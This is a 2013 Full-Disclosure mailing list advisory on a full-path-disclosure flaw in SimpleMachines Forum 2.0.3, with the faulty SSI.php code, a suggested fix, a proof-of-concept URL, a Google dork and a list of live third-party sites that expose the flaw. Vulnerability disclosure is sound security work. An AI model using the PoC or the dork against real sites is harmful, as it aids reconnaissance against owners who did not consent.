[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CACHAsRf+k4ZNcHWkeaF8Z9WHU9vpmjtPYEWsXSe8i2dpzjdQoQ@mail.gmail.com>
Date: Thu, 3 Jan 2013 11:35:08 -0300
From: WHK Yan <yan.uniko.102@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Path Disclusore in SimpleMachines Forum <= 2.0.3
*Summary:*
--------------
A security flaw allows an attacker to know the full path of the web system.
*Details:
-----------
*SSI.php Line 294:
// Fetch a post with a particular ID. By default will only show if you have
permission to the see the board in question - this can be overriden.
function ssi_fetchPosts($post_ids, $override_permissions = false,
$output_method = 'echo')
{
$post_id is not defined. Possible fix: ($post_id = false)
*PoC:
-------
*http://example.com/forumpath/SSI.php?ssi_function=fetchPosts
*Google Dorks:
---------------------
*inurl:?index.php?action=help
*Demos:
-----------
*http://simpleportal.net/SSI.php?ssi_function=fetchPosts
http://www.furgovw.org/SSI.php?ssi_function=fetchPosts
http://www.teachmideast.com/forum_old/SSI.php?ssi_function=fetchPosts
http://www.slowracing.com/jaxfox/SSI.php?ssi_function=fetchPosts
http://www.iptv2you.com/board/SSI.php?ssi_function=fetchPosts
http://voceteopr.com/SSI.php?ssi_function=fetchPosts
http://www.thesilverball.com/SSI.php?ssi_function=fetchPosts
http://othforums.com/SSI.php?ssi_function=fetchPosts
http://www.skinmod.eu/SSI.php?ssi_function=fetchPosts
Referer and Mirror:
-------------------------
http://whk.drawcoders.net/index.php/topic,2792.0.html
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists